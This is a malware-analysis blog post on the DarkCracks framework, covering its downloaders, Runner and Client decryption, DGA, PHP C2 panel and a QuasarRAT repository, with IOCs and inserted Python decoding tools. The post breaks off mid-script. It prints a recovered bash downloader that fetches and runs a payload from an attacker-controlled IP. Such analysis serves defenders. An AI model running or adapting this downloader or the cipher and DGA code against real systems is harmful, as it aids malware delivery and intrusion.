Source: https://blog.xlab.qianxin.com/darkcracks-an-advanced-stealthy-payload-delivery-and-upgrade-framework/
# Uncovering DarkCracks: How a Stealthy Payload Delivery Framework Exploits GLPI and WordPress

Alex.Turing, Acey9, tf0xn · September 4, 2024 · 22 min read

## Summary

XLab's Cyber Threat Insight and Analysis system (CTIA) recently detected a sophisticated malicious payload delivery and upgrade framework, which we have named DarkCracks. The framework is characterized by a zero detection rate on VirusTotal, high persistence, stealth, and a well-designed upgrade mechanism, and it uses high-performance, stable online infrastructure as its backbone. Based on our data, DarkCracks is a meticulously crafted piece of malware, indicating that its creators are far from mere script kiddies. While we have mapped out its payload delivery and upgrade framework, the high level of stealth employed by DarkCracks has so far left us with limited visibility into its Launcher component. However, on August 26th we observed a new password-protected PDF file named "resume" being added to the GitHub repository. This file was later renamed to the Korean name "김영미 이력서" (Kim Young-mi's resume).
Given how common this Korean name is, we strongly suspect that part of this component's functionality involves social engineering targeting Korean-speaking users.

DarkCracks exploits compromised GLPI and WordPress sites to function as Downloaders and C2 servers. These compromised sites are used to collect sensitive information from infected devices, maintain long-term access, and serve as relay nodes to control other devices or deliver malicious payloads, effectively masking the attacker's tracks. Within our monitoring scope, targeted entities include public service systems across different countries, such as school websites, public transportation systems, and even prison visitor systems.

## Discovery Journey

On June 5, 2024, CTIA issued an ELF_Downloader alert for network traffic associated with the ELF file 8b3d2b156424e5a0dc3f6d2b0dec96b2. The traffic was plain HTTP and was traced to the download path /vendor/sabre/event/lib/Promise/wk8dnj2k-x64-musl; the unusually deep directory structure raised suspicions of a breach. Upon further investigation, we confirmed that the server at IP 45.169.87.67 had been compromised, the attack surface being the GLPI system running on that IP.

The file wk8dnj2k-x64-musl was identified as a Runner, responsible for decrypting the JSON configuration file specified by its parameter and then downloading, decrypting, and executing the Client designated in the clientUrl field. The Client's role is to report the compromised device's information, driven by C2-issued configuration files, and to download updates for the Runner, Client, Launcher, and other components. As of now, both the Runner and Client components have a zero detection rate on VirusTotal, indicating that they have been operating under the radar of security vendors for over a year.

On June 12, 2024, another download script, f8a495a98c43b0805f53be14db09c409, came to our attention.
It used a similar download path, /vendor/sebastian/diff/src/Exception/pQ1iM9hd-x64-musl. This file was strikingly similar to wk8dnj2k-x64-musl, and the server hosting it, at IP 179.191.68.85, was also running GLPI. The appearance of similar files with different names, hosted on different servers and paths, strongly indicated an unknown attacker actively breaching GLPI systems and using the compromised devices as infrastructure for their cybercriminal activities.

To trace the origins, we embarked on a thorough investigation, uncovering key insights into the samples, configuration files, C2 servers, and targeted victims:

1. The compromised systems belong to critical infrastructure across different countries, including school websites, public transportation systems, and prison visitor systems.
2. Through the XLab command tracking system, we intercepted a directive to change the C2 server; the new C2 was a compromised WordPress site.
3. We discovered a GitHub project named "sudoku1," created on July 11, 2023, which stores configuration files.
4. On VirusTotal, we identified an ELF file, c447f7980a18205f309d8432f312fe69, sharing the same origin as the Client. The file contains the source path /home/erin/Desktop/Works/smart-update/SmartUpdate/client.
5. XLab proactively contacted the victims and gained access to the C2 Panel, ultimately uncovering the workings of its "Admin Mode."
6. We also found another GitHub project, "ftMQPwsMnB," containing a decoy file titled "김영미 이력서" (Kim Young-mi's resume) and QuasarRAT.

In conclusion, a well-designed malicious payload delivery and upgrade framework, active for over a year, has come into sharp focus. This framework, which we have named DarkCracks after its XOR key "Crackalackin," leverages compromised GLPI and WordPress sites as Downloaders and C2 servers.
Its primary objectives are to gather sensitive information from infected devices, maintain long-term access, and use the compromised, stable, high-performance devices as relay nodes to control other devices or deliver malicious payloads, effectively obfuscating the attacker's footprint. The high persistence, stealth, and sophisticated upgrade design, coupled with the strategic selection of stable online infrastructure, suggest that the attackers behind this framework are far from ordinary script kiddies. Although we are currently unable to capture the Launcher component or monitor DarkCracks' further activities, the fact that it has remained undetected by security products for over a year underscores the stealth and efficiency of its methods. This warrants serious attention, and we have documented our findings to share with the security community.

## Targeted Victims

DarkCracks assigns roles according to the performance of the victim's device: high-performance devices handle infrastructure roles such as C2 and Downloader, while lower-performance devices act as Bot nodes.

DarkCracks targets WordPress and GLPI. WordPress is a globally recognized web content management system, which I won't elaborate on here. GLPI (Gestionnaire Libre de Parc Informatique) is a lesser-known open-source IT asset and service management system that helps organizations manage their IT assets, including hardware, software, and network devices. It is widely used in small and medium-sized enterprises, educational institutions, and government agencies to improve IT infrastructure management and maintenance.

Among the 13 C2/Downloader instances we observed (all compromised devices), there are important targets involving city public transport systems, prison visitor scheduling systems, financial institutions, and other key organizations across various countries. According to QiAnXin EagleMap, 10,157 GLPI services are currently exposed online.
Organizations using GLPI should urgently check and secure their systems.

## Timeline

Based on the information we have gathered, we have compiled the following timeline of DarkCracks' activities. Please note that this reflects only our current intelligence; DarkCracks' actual activities may have started earlier.

* 2023.07.11: The user "adrhpbrn29" created the project "sudoku1" to store backup configuration files.
* 2023.07.18: An unencrypted Client was uploaded to VirusTotal from China, with sensitive strings left in plaintext.
* 2024.05.23: Runner samples were uploaded to VirusTotal from Poland, South Korea, the Netherlands, the UK, Germany, and the US. The sensitive strings in these samples were fully encrypted.
* 2024.06.05: The DarkCracks Downloader was first detected when XLab found that the IP address 45.169.87.67 had been compromised and was hosting multiple Runners (including the ones from May 23), configuration files, and Client downloads.
* 2024.06.06: Analysis of the Runner was completed, and the configuration files and Client were successfully decrypted. Backup configurations were found to be stored on GitHub, with version number SUC 2.0. Samples for some CPU architectures supported a DGA (Domain Generation Algorithm).
* 2024.06.10: A C2-update command was intercepted; the new C2 server was a compromised WordPress site.
* 2024.06.12: The IP address 179.191.68.85 was found to be compromised and serving as a download server for DarkCracks. Backup configurations were stored on Pastebin with version number SUC 2.01, and samples for all CPU architectures supported DGA.
* 2024.06.14: A victim provided XLab with the implants left by the attackers on their device, including the C2 panel and configuration files.
* 2024.07.23: Another Runner sample was uploaded to VirusTotal from Finland, Japan, and the US. This sample did not have encrypted sensitive strings and did not support DGA.
* 2024.08.23: The user "adrhpbrn29" created the project "ftMQPwsMnB" to distribute QuasarRAT.

## Technical Details

Next, we start with the Downloader and gradually introduce the key components of DarkCracks: the Runner, Client, Launcher, and C2 Panel. By analyzing the function of each component in depth, we aim to clarify the framework's design principles and show how DarkCracks covertly delivers its payloads through these elements.

### Part 1: Downloader Analysis

We have observed two distinct forms of Downloader: one is a Metasploit Stager that first receives shellcode to build a shell execution environment and then executes a wget download; the other is a bash script that downloads files directly via wget or curl.

#### 0x01: Metasploit Stager

* MD5: 8b3d2b156424e5a0dc3f6d2b0dec96b2
* Magic: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked

The Stager communicates with 213.139.233.163:18441, generating the network traffic shown below. Its purpose is to request the file wk8dnj2k-x64-musl from 45.169.87.67. The file wk8dnj2k is in fact DarkCracks' Runner component.

On 45.169.87.67, we discovered multiple variants of the Runner (wk8dnj2k-{cpu}-{compiler}) compiled for ARM, MIPS, and x86/x64 CPU architectures with different toolchains (gnu, uclibc, and musl). We also found encrypted Client files (se3hf6jwc-{cpu}-{compiler}) and encrypted configuration files (qoakeifm-unknown.txt).

#### 0x02: Bash Script

* MD5: f8a495a98c43b0805f53be14db09c409
* Magic: Bourne-Again shell script text executable

The script's functionality is straightforward: it requests pQ1iM9hd-x64-musl and j8UgL3v from 179.191.68.85. The former is a Runner, while the latter is an encrypted configuration file.
```bash
#!/bin/bash
# Downloader script as recovered: the Runner is saved as "wdvsh", the encrypted config as "agr"
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;
wget "http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/pQ1iM9hd-x64-musl" -O wdvsh|curl "http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/pQ1iM9hd-x64-musl" -o wdvsh;
wget http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/j8UgL3v -O agr|curl http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/j8UgL3v -o agr;
chmod +x ./wdvsh;
# Run the Runner with the config file as its only argument, then remove both files
./wdvsh agr;
sleep 3;
rm ./wdvsh;
rm ./agr;
```

Similarly, 179.191.68.85 also hosts DarkCracks components for various CPU architectures.

### Part 2: Runner Analysis

The Runner hosted on 45.169.87.67, identified as wk8dnj2k-{cpu}-{compiler}, is version 2.0, while the pQ1iM9hd series from 179.191.68.85 is version 2.01. The differences between them are minimal. This analysis focuses primarily on the wk8dnj2k Runner for the x64 CPU architecture. Its basic information:

* Name: wk8dnj2k-x64
* MD5: 93a7cba1edbacb633021ebc38c10a79f
* Magic: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 3.2.0, stripped

As the name suggests, the Runner's primary function is to act as a launcher responsible for downloading, decrypting, and executing the Client. Specifically, when the Runner executes, it first checks its runtime parameters; it accepts at most one parameter, the path of an encrypted JSON configuration file. A valid configuration file, once decrypted, must contain at least three fields: key (the key and IV needed to decrypt the Client), emUrl (the download address of the backup configuration file), and clientUrl (the download address of the encrypted Client).

Upon validating the configuration file, the Runner creates a working directory at /var/tmp/.shm, moves itself there, and renames itself to a UUID-formatted filename. It then generates a new encrypted file, 2b6f92be-6ff1-4b6d-98ce-f5597c69f4b1, whose SH3 field contains the content of the original configuration file.
The Runner achieves persistence through crontab, .bash_profile, or /etc/init.d/rnd. Finally, it downloads, decrypts, and executes the Client. If no parameter is specified, the Runner checks for the file /var/tmp/.shm/2b6f92be-6ff1-4b6d-98ce-f5597c69f4b1, retrieves the configuration from its SH3 field, and proceeds with the decryption, download, and execution of the Client.

#### 0x01: Decrypting Sensitive Strings

To hide its functionality from casual inspection, the Runner stores sensitive strings encrypted and decrypts them on demand with the decstr function. To recover these strings, one can emulate decstr with flare_emu. For example, the ciphertext "9MwEVEVWWExM5AkO" corresponds to the plaintext "clientUrl":

```python
import flare_emu


def ignorefree(eh, address, argv, funcName, userData):
    # Hook free() so the emulated decstr does not release the result buffer before we read it
    eh.uc.reg_write(eh.regs["rax"], 0)


ciphertxt = b'9MwEVEVWWExM5AkO'
eh = flare_emu.EmuHelper()
eh.apiHooks['free'] = ignorefree
# Emulate decstr with rdi pointing at the ciphertext; the plaintext pointer comes back in the return register
eh.emulateRange(startAddr=0x00000000000F9D0, skipCalls=False, registers={'rdi': ciphertxt})
print(eh.getEmuString(eh.getRegVal('ret')))
```

Of course, for a security analysis a black-box decryption is not enough. After closer examination, the decryption logic of decstr breaks down into three steps:

1. Reverse the string and decode it using URL-safe Base64.
2. XOR each byte with "Crackalackin'".
3. Swap the case of the ASCII letters and decode again using URL-safe Base64.

Using the IDAPython script in the appendix, the encrypted strings can be restored and patched in place, making reverse engineering much easier.

#### 0x02: Decrypting the Configuration

We captured two configuration files, qoakeifm-unknown and j8UgL3v. They use the same encryption scheme as the sensitive strings. Once decrypted, it is noteworthy that emUrl points to backup configurations stored on third-party platforms, GitHub and Pastebin.
* Configuration file qoakeifm-unknown from 45.169.87.67:
* Configuration file j8UgL3v from 179.191.68.85:

Each field in the configuration file is described in the table below:

| Item | Description |
| --- | --- |
| key | AES key and IV |
| url | Client report entry |
| authHeader | Auth string |
| emUrl | Backup config |
| runnerUrl | Runner download URL |
| clientUrl | Client download URL |

#### 0x03: Persistence Mechanism

After successfully decrypting a valid configuration file, the Runner creates the working directory /var/tmp/.shm, moves itself there, renames itself with a UUID, and generates a new encrypted configuration file, 2b6f92be-6ff1-4b6d-98ce-f5597c69f4b1. After moving the file, the Runner establishes persistence using one of the following methods:

1. If the device supports crontab, it uses crontab.
2. If crontab is unavailable and the current user is a regular user, it uses .bash_profile.
3. If crontab is unavailable and the current user is root, it uses /etc/init.d/rnd.

#### 0x04: Downloading the Encrypted Client

The Runner attempts to download the encrypted Client by iterating through three different types of URL. If any of them succeeds, the loop exits; otherwise, it waits 6 to 18 hours before trying again. We refer to this as three-layer URL task polling.

* clienturl: Direct mode. The CPU architecture string of the sample is simply appended to obtain the Client's download address.
* emurl and dgaurl: Indirect mode. The Runner first downloads the page the URL points to, locates the backup configuration in the seed_string, and decrypts it to obtain a new clienturl.

This forms a redundant structure: the first layer (clienturl) typically points to compromised sites, which are unstable and may be cleaned up; the second layer (emurl) points to third-party content hosting platforms, which are more stable but still risk being banned; the final layer (dgaurl) is generated monthly as a last resort.
##### emUrl

Handling clienturl is straightforward, so let's focus on emurl and dgaurl. For example, the emurl in the qoakeifm-unknown configuration file (https://raw.githubusercontent.com/adrhpbrn29/sudoku1/main/main.cpp) contains the following backup configuration in the seed_string variable. After decrypting the seed_string, the Runner obtains the clienturl and re-enters direct download mode.

The sudoku1 project was created on July 11, 2023, at 17:08:29, and the first commit containing seed_string was pushed at 17:24:02. There are currently six commits:

| Commit | Date | authHeader |
| --- | --- | --- |
| e1e10dc | 2024.03.28 | LJHRQWE |
| abb67fc | 2024.03.13 | LJHRQWE |
| 6392b06 | 2023.12.27 | LJHRQWE |
| c72963b | 2023.10.04 | SLDJKFA |
| 248c8a8 | 2023.10.04 | Linux Max |
| 5970967 | 2023.07.11 | Rbz021g6 |

Using git diff, we checked every commit and found the changes concentrated in the seed_string variable in main.cpp, from which we extracted six different clienturl and C2url values (details in the GitHub part of the IOC section).

In the configuration file j8UgL3v, the emurl is https://pastebin[.]com/raw/GYEBVyMR. Besides providing the seed_string described above (see the Pastebin part of the IOC section), this page offers another perspective: Pastebin's visitor statistics. Currently, the number of unique IPs that have accessed this page is approaching 300.

##### dgaUrl

The logic for handling dgaurl is similar to emurl; the difference is the source. While emurl comes from the configuration file, dgaurl is generated algorithmically. The algorithm is simple: a domain is generated monthly by formatting the current year and month as "%d%02d", encrypting the result with the string encryption algorithm described earlier, and inserting it into "http://%s.com" to form the dgaurl. For example, the DGA domain generated for "202408" is UVDFUgOAgjL.com. We checked the dgaurl values from 2023 to the present (details in the DGA part of the IOC section) and found that none of the domains are registered.
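The string cipher from 0x01 and the DGA just described, reimplemented as an added Python example. This is the editor's code, not XLab's tooling or the malware's own, written from the three steps and the two test vectors the article gives ("9MwEVEVWWExM5AkO" decrypts to "clientUrl", and "202408" yields UVDFUgOAgjL.com). It also covers the configuration check from 0x02 (key, emUrl and clientUrl must be present) and, going slightly beyond the text, enumerates a whole range of monthly DGA domains the way a defender would pre-compute a blocklist. The XOR key is taken as the 13-byte "Crackalackin'" the article quotes; both test vectors are shorter than that, so only the first 12 key bytes are actually verified here. The URLs in SAMPLE_CONFIG are placeholders, not values from the page.

```python
import base64
import json

# XOR key as the article quotes it ("Crackalackin'", 13 bytes). Both strings the
# article gives as test vectors are shorter than the key, so only its first 12
# bytes are exercised below; the 13th byte is taken from the article as-is.
XOR_KEY = b"Crackalackin'"

# Fields the article says a decrypted Runner configuration must contain.
REQUIRED_FIELDS = ("key", "emUrl", "clientUrl")


def _b64u_decode(text: str) -> bytes:
    """URL-safe Base64 decode that restores the '=' padding the samples strip."""
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _b64u_encode(data: bytes) -> str:
    """URL-safe Base64 encode without '=' padding (the DGA labels carry none)."""
    return base64.urlsafe_b64encode(data).decode("ascii").rstrip("=")


def _xor(data: bytes, key: bytes = XOR_KEY) -> bytes:
    """Repeating-key XOR."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def _swapcase(data: bytes) -> bytes:
    """Flip the case of ASCII letters only; digits, '-' and '_' are left untouched."""
    return bytes(b ^ 0x20 if 0x41 <= b <= 0x5A or 0x61 <= b <= 0x7A else b for b in data)


def decstr(cipher: str) -> str:
    """The Runner's decstr: reverse, Base64-decode, XOR, swap case, Base64-decode."""
    stage1 = _b64u_decode(cipher[::-1])
    stage2 = _swapcase(_xor(stage1))
    return _b64u_decode(stage2.decode("ascii")).decode("utf-8")


def encstr(plain: str) -> str:
    """Inverse of decstr; the DGA applies this to the year/month string."""
    stage1 = _swapcase(_b64u_encode(plain.encode("utf-8")).encode("ascii"))
    stage2 = _xor(stage1)
    return _b64u_encode(stage2)[::-1]


def dga_url(year: int, month: int) -> str:
    """Monthly DGA: format "%d%02d", encrypt with encstr, insert into "http://%s.com"."""
    return "http://%s.com" % encstr("%d%02d" % (year, month))


def dga_domains(start=(2023, 1), end=(2024, 8)) -> list:
    """Enumerate the DGA URLs for an inclusive range of months (for blocklists or DNS hunting)."""
    out = []
    y, m = start
    while (y, m) <= end:
        out.append(dga_url(y, m))
        y, m = (y + 1, 1) if m == 12 else (y, m + 1)
    return out


def parse_config(cipher: str) -> dict:
    """Decrypt a Runner configuration blob and enforce the three mandatory fields."""
    cfg = json.loads(decstr(cipher))
    missing = [f for f in REQUIRED_FIELDS if f not in cfg]
    if missing:
        raise ValueError("configuration missing required field(s): " + ", ".join(missing))
    return cfg


# Constructed configuration in the layout of the article's decrypted configs:
# the key value is the one the article reports, the URLs are placeholders.
SAMPLE_CONFIG = {
    "key": "2D8C7FEE42D3DB4A8E55FBFF65351E1BB8ADDBA8FCBD0F85EE1CA5033D0DF342",
    "url": "http://c2.example.invalid/detail.php",
    "authHeader": "XLab",
    "emUrl": "https://paste.example.invalid/raw/PLACEHOLDER",
    "runnerUrl": "http://dl.example.invalid/runner",
    "clientUrl": "http://dl.example.invalid/client",
}
SAMPLE_CONFIG_BLOB = encstr(json.dumps(SAMPLE_CONFIG))


if __name__ == "__main__":
    print(decstr("9MwEVEVWWExM5AkO"))          # clientUrl
    print(dga_url(2024, 8))                      # http://UVDFUgOAgjL.com
    print(parse_config(SAMPLE_CONFIG_BLOB)["clientUrl"])
```

Because the scheme is a fixed-key XOR wrapped in two Base64 layers, anyone holding the key can both decrypt recovered configs and pre-compute every future DGA domain; that is the reversibility the conclusion flags as the framework's weak point, and it is also why a defender can register or sinkhole the monthly domains ahead of time.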
This indicates that DarkCracks has remained well hidden: the emurl mechanism has gone unnoticed by the security community, so the operators have not yet needed to activate this final fallback.

#### 0x05: Decrypting and Executing the Client

The Client is encrypted with AES in CBC mode, with the decryption key and IV taken from the configuration file's key field. The key is a hex string in which the first 16 bytes are the AES key and the last 16 bytes are the IV. The keys in the two captured configuration files are identical: 2D8C7FEE42D3DB4A8E55FBFF65351E1BB8ADDBA8FCBD0F85EE1CA5033D0DF342.

* AES Key: 2D 8C 7F EE 42 D3 DB 4A 8E 55 FB FF 65 35 1E 1B
* AES IV: B8 AD DB A8 FC BD 0F 85 EE 1C A5 03 3D 0D F3 42

Once the Runner has decrypted the Client, it saves it in the /tmp directory, launches it with execl, and deletes itself.

### Part 3: Client Analysis

In this section we analyze the se3hf6jwc-x64 Client. Its basic details before and after decryption are below (readers can use the CyberChef recipe in the appendix to decrypt the Client themselves):

* Name: se3hf6jwc-x64
* MD5: 81eccc9c10368aa54cfed371f83da45a
* MD5: fe5f484f71bf0fd7afa56e60da7eec6f (decrypted)
* Magic: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 3.2.0, stripped

Our analysis confirmed that the Client shares the Runner's architecture: a "configuration-file-driven + three-layer URL task polling" structure. However, unlike the Runner, which primarily polls the clientUrl, the Client focuses on the C2 reporting endpoint specified in the url field of the configuration file. The Client encrypts and reports sensitive device information to the C2 server, which responds with encrypted configurations that drive the execution of different tasks. Key tasks include:

* NewVersion: download and update the Runner and Client.
* NewLauncherVersion: download and update the Launcher.
* versionCheckerUrl: update the C2 reporting endpoint.

#### 0x01: C2 Communication

The Client constructs a JSON-formatted beacon with the code snippet below, encrypts it, and sends it as the HTTP body to the C2 server. The Client supports both HTTP and HTTPS. Notably, the platform field is formatted as "arch/user(euid)/version", with the version obtained from /proc/version.

As seen in the captured traffic, the body of the exchange is encrypted. After decrypting the C2 response, we see that the Client receives a message with a versionCheckerUrl field. The Client then updates its C2 reporting endpoint and requests a new configuration file:

```json
{
    "versionCheckerUrl": "https:\\/\\/www.miracles.com.hk\\/wp-content\\/plugins\\/foxiplugin\\/detail.php",
    "authHeader": "Linux MaEW"
}
```

#### 0x02: Speculations on the Launcher Component

Although we have not captured the Launcher component, we can infer the following from how the Client handles NewLauncherVersion:

* The Launcher is stored AES-encrypted on a remote server.
* The Launcher likely supports the same encryption algorithm as the Runner and Client.
* The Launcher is also driven by a configuration file, with its core configuration stored at /var/tmp/.shm/9d8dadaf-6c7e-4975-b26d-ec17e67493c6.

#### 0x03: Evolution of the Client

We compared the 2.0 and 2.01 versions of the Client. The primary differences are whether sensitive strings are encrypted and whether the Client supports the DGA. These changes appear aimed at improving the Client's stealth and robustness.

| Version | Encrypted Strings | DGA Support |
| --- | --- | --- |
| SUC 2.0 | N (x86/x64: Y) | N (x86/x64: Y) |
| SUC 2.01 | Y | Y |

Interestingly, even in SUC 2.0 the x86/x64 Client already supported string encryption and the DGA.
This indicates that DarkCracks takes a cautious approach to feature upgrades, first testing new features on select architectures before rolling them out to all architectures once they are functional and stable.

### Part 4: C2 Panel Analysis

A user whose device was compromised provided us with the C2 Panel files. Basic information about the file:

* MD5: 8103a187a710378020dbdee8ff213b5b
* MD5: 69ef27f8e69dbba222c3c33a53906d79 (deobfuscated)
* Obfuscation: Yes

The file is heavily obfuscated, but it can be deobfuscated by progressively replacing eval with print. The C2 Panel is implemented in PHP and consists of around 600 lines of code. Its functionality is relatively simple: it handles requests from different sources according to a hardcoded configuration file, tem9FG5.tmp, and operates in two modes, management mode and business mode.

* Management Mode: handles requests from the Bot Master. The C2 Panel adds, deletes, modifies, or queries the configuration file according to the request.
* Business Mode: the C2 Panel decides, based on the configuration file, whether to log the Bot or respond to it.

##### Request Source Identification

The C2 Panel distinguishes the request source using the authentication field. If the field's value is Statistics, the request is from the Bot Master; otherwise, it is from a Bot. The authentication field also serves to verify whether a request comes from a legitimate Bot: each C2 Panel has a specific authHeader set during initialization, and the C2 only responds when the Bot's authentication value matches the C2's authHeader.

##### Configuration File (tem9FG5.tmp)

The configuration file, tem9FG5.tmp, acts like a database, recording the Bot Master's settings and storing information about the Bots.
To understand the format and fields of this configuration file, we generated one by sending two test requests to a test machine, simulating initialization and a Bot check-in.

1. Initialize the configuration:

```json
{"authentication":"Statistics","isActive":true,"authHeader":"XLab"}
```

2. Bot check-in:

```json
{"authentication":"XLab","uuid":"fac60bdc-5786-415e-8992-79abcb132d64","platform":"x64 / root(0) / Linux","interval":8867000,"version":"SUC 2.01","launcherVersion":""}
```

The generated network traffic is as follows:

The C2 Panel on the test machine generated the following encrypted configuration in response to the above requests:

Decrypting the configuration file is straightforward: strrev(convert_uudecode($input)). The decrypted plaintext matches our constructed requests, showing that the configuration file is JSON. Bot-related information is stored in the clients field, and the authHeader in the config field. The fields supported by the configuration file:

| Field | Description |
| --- | --- |
| config | C2 status |
| clients | Bot info |
| pendingChanges | Config to be delivered |
| sessions | Command output from Bots |
| sessionCommands | Commands to be delivered |

The Bot Master uses the pendingChanges and sessionCommands fields to deliver instructions to the Bot. The following code snippet shows how the C2 Panel checks the client's uuid to decide whether to issue the Launcher configuration.

The configuration file provided by the victim mentioned a compromised site, soussanart.com. We sent a client query request to this site and obtained information about 76 clients, spread across 17 countries and running 4 different versions, from 1.2 to 2.02.

This concludes our analysis of DarkCracks. Clearly, many puzzles remain unsolved, and we believe this is just the beginning of uncovering the full extent of this threat.
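As an added Python example (editor's code, not the panel's PHP or XLab's tooling), here is the tem9FG5.tmp "encryption" from the panel analysis above, strrev(convert_uudecode($input)), reproduced for an incident responder who has recovered such a file from a compromised web server and wants to read it without PHP. The decoder mimics PHP's convert_uudecode line format (a length byte, the data, a newline, then a lone backtick terminator) and is checked against the example from the PHP manual. The sample panel configuration is constructed in the field layout the article lists; the exact shape of the clients entry (here, a list of check-in records) is an assumption. The version-count helper is the kind of triage one would run on a real recovered file.

```python
import binascii
import json
from collections import Counter

# Known vector from the PHP manual's convert_uuencode() example, used to check the
# decoder against PHP's line format: length byte, data, newline, then a "`" line.
PHP_MANUAL_UU = "0=&5S=`IT97AT('1E>'0-\"@``\n`\n"
PHP_MANUAL_PLAIN = b"test\ntext text\r\n"


def php_uuencode(data: bytes) -> str:
    """Mimic PHP convert_uuencode(): 45-byte uu lines, zero bits written as '`', then a '`' terminator line."""
    lines = [binascii.b2a_uu(data[i:i + 45], backtick=True).decode("ascii")
             for i in range(0, len(data), 45)]
    return "".join(lines) + "`\n"


def php_uudecode(text: str) -> bytes:
    """Mimic PHP convert_uudecode(): decode each length-prefixed line until the '`' terminator."""
    out = bytearray()
    for line in text.splitlines():
        if line in ("", "`"):
            break
        out += binascii.a2b_uu(line)
    return bytes(out)


def decode_panel_config(blob: str) -> dict:
    """strrev(convert_uudecode($input)) as the article gives it, then JSON-parse the result."""
    return json.loads(php_uudecode(blob)[::-1].decode("utf-8"))


def encode_panel_config(cfg: dict) -> str:
    """The inverse, i.e. what the panel has to do to write tem9FG5.tmp: uuencode(strrev(json))."""
    raw = json.dumps(cfg, separators=(",", ":")).encode("utf-8")
    return php_uuencode(raw[::-1])


def clients_by_version(cfg: dict) -> dict:
    """Triage helper: count check-ins per reported client version."""
    return dict(Counter(c.get("version", "?") for c in cfg.get("clients", [])))


# Constructed sample in the field layout the article lists (config, clients,
# pendingChanges, sessions, sessionCommands); the list shape of "clients" is assumed.
SAMPLE_PANEL_CONFIG = {
    "config": {"isActive": True, "authHeader": "XLab"},
    "clients": [
        {"uuid": "fac60bdc-5786-415e-8992-79abcb132d64", "platform": "x64 / root(0) / Linux",
         "interval": 8867000, "version": "SUC 2.01", "launcherVersion": ""},
        {"uuid": "11111111-2222-4333-8444-555555555555", "platform": "armv7 / pi(1000) / Linux",
         "interval": 8867000, "version": "SUC 2.0", "launcherVersion": ""},
    ],
    "pendingChanges": {},
    "sessions": {},
    "sessionCommands": {},
}


if __name__ == "__main__":
    blob = encode_panel_config(SAMPLE_PANEL_CONFIG)
    print(blob)
    print(clients_by_version(decode_panel_config(blob)))
```

Note that uuencode plus string reversal is an encoding, not encryption: there is no key, so anyone who can read tem9FG5.tmp from a compromised host can recover every Bot record and the authHeader that gates the panel. That is the practical side of the article's remark that the management mode is easily reachable.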
### Part 5: ftMQPwsMnB Analysis

On August 23, 2024, as we were wrapping up the analysis above, we noticed that the user adrhpbrn29 had created a new project named ftMQPwsMnB. The project contains a single compressed file, bzupdater.zip, which holds three files: config.ini, Updater.exe, and version.dll.

#### 0x01: Initial Analysis

A quick analysis confirmed that version.dll is malicious. It uses AES to decrypt a binary resource, which yields shellcode; the shellcode loads a payload that is the open-source remote access trojan QuasarRAT. The AES key is FCFF50FB13B09C44F806CF4947381718 and the IV is 2DD695D6845AA9F83F0071B709D78CBD. In addition to AES, XOR is used to decrypt strings, with the XOR key quackquack.

Currently, the ftMQPwsMnB project has five commits. Although the MD5 hash of version.dll varies with each commit, there are only three distinct core binaries:

| Commit | MD5 of version.dll | MD5 of "Binary" |
| --- | --- | --- |
| 7ddc62e | 456d05566fc3391e195a5f9cb346c92c | 91bcbf4de7ff8bddebdc49b62cad1ac1 |
| ab75b85 | c2d69f5e5fa2af8131f1cb3d9fdfbd4b | 05481286a1aa1f0d7d9df7bbbb3aeb73 |
| ab6a892 | 9e94126e8a26efd10b2a5b179d64be90 | 05481286a1aa1f0d7d9df7bbbb3aeb73 |
| 271b28c | ceb7f3d92096892410e041a3b318ab9b | 05481286a1aa1f0d7d9df7bbbb3aeb73 |
| 653eb26 | ca93591a9441a2ade70821f67292d982 | 6176c8374cd656783c9b354944c8052e |

#### 0x02: QuasarRAT Payload

QuasarRAT is a well-known remote access Trojan (RAT), and numerous analyses are available online for those interested. In this case, the configurations of the three shellcodes delivering QuasarRAT are nearly identical, differing mainly in the C2 server port. For example, the QuasarRAT delivered by commit ab75b85 has the following configuration:

As of now, we have not identified the exact distribution method for this project.
However, the config.ini file references Bandisoft, a paid software product, suggesting that one potential distribution method is to entice users to download and install a free "cracked" version.

#### 0x03: Suspicious PDF File

On August 26, the project received two more commits, adding a PDF file initially named resume.pdf. The file is password-protected, so we do not currently know its contents. About 50 minutes later, the file was renamed to the Korean title 김영미 이력서.pdf, which translates to "Kim Young-mi's resume." Resumes are common phishing lures, leading us to speculate that Korean-speaking users may be among DarkCracks' targets.

| Date | Commit | Filename | MD5 |
| --- | --- | --- | --- |
| 2024/08/26 09:19:32 | 5130de3 | resume.pdf | 71ebe71eec7e0f2420cd931534dd22c3 |
| 2024/08/26 10:09:27 | a04bf51 | 김영미 이력서.pdf | 71ebe71eec7e0f2420cd931534dd22c3 |

## Conclusion

DarkCracks is a well-designed yet flexible payload delivery and upgrade framework with several notable strengths. Its three-layer URL polling mechanism provides robust reliability, ensuring that payloads can be delivered even when some delivery channels fail. The encrypted delivery of multiple components, combined with their self-deletion after execution, effectively shields its core functionality from detection.

There are, however, notable weaknesses. One significant vulnerability is the use of a reversible algorithm to derive the backup-configuration domains (dgaUrl), which exposes the entire network to the risk of hijacking. In addition, the C2 Panel's management mode is easily reachable: anyone familiar with the protocol can modify or even wipe the configuration file, potentially shutting down the C2 and paralyzing the network.

We recommend that network administrators monitor the /var/tmp/.shm directory described above to detect potential infections. Victims are encouraged to contact us for technical support.
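To make the monitoring recommendation concrete, here is an added host-side check in Python (the editor's example, not an XLab tool) that looks for the artefacts the analysis names: the hidden /var/tmp/.shm working directory, the two UUID-named configuration blobs (2b6f92be-... for the Runner, 9d8dadaf-... for the Launcher), any other UUID-named file there (the Runner renames itself that way), the /etc/init.d/rnd script, and crontab or .bash_profile entries. The article does not show the exact crontab or profile line the Runner writes, so matching persistence entries by a reference to the .shm directory is an assumption; the demo tree and its extra UUID filename are constructed, and the scan takes a root path so it runs offline against that tree.

```python
import os
import re
import tempfile

# Indicators taken from the article: the Runner's hidden working directory, the
# Runner's and Launcher's UUID-named config blobs, and the root persistence script.
WORK_DIR = os.path.join("var", "tmp", ".shm")
KNOWN_BLOBS = {
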